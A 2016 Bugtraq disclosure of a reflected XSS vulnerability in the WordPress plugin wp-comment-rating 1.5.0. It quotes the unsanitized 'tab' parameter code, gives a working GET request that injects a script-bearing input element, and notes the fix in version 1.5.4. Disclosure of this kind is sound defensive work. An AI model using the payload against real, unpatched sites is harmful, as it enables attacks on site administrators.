[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: WP-Comment-Rating XSS Vulnerability
From: Rahul Pratap Singh <techno.rps () gmail ! com>
Date: 2016-01-30 15:03:28
Message-ID: 56ACCDF0.5050400 () gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/mixed)]
## FULL DISCLOSURE
#Product : wp-comment-rating
#Exploit Author : Rahul Pratap Singh
#Version : 1.5.0
#Home page Link :
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
"tab" parameter is not sanitized that leads to Reflected XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: wpb_plugin_admin_page.php
line:194
$this->current_tab = isset( $_GET['tab'] ) ? $_GET['tab'] : '';
line:553
$active_tab = $this->current_tab;
line:558
$active_tab = isset( $this->tabs[0] ) && empty( $active_tab ) ?
$this->tabs[0]->
get_id() : $active_tab;
line:561
<div class="wrap wrap-<?php echo $this->page_hook . ' active-tab-' .
$active_tab; ?>">
----------------------------------------
Exploit:
----------------------------------------
GET /wp-admin/edit-comments.php?page=wpcommentrating&tab=">
< input type=text onclick=alert(/XSS/)><!--
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/wpcommentratingxsspoc1.png
Fix:
Update to 1.5.4
Vulnerability Disclosure Timeline:
→ January 24, 2015 – Bug discovered, initial report to Vendor
→ January 25, 2015 – Vendor Acknowledged
→ January 27, 2015 – Vendor Deployed a Patch
#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################
Pub Ref:
https://0x62626262.wordpress.com/2016/01/30/wp-comment-rating-xss-vulnerability/
http://codecanyon.net/item/wordpress-comment-rating-plugin/6582710
["0x9ACF7D5F.asc" (application/pgp-keys)]
["signature.asc" (application/pgp-signature)]
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic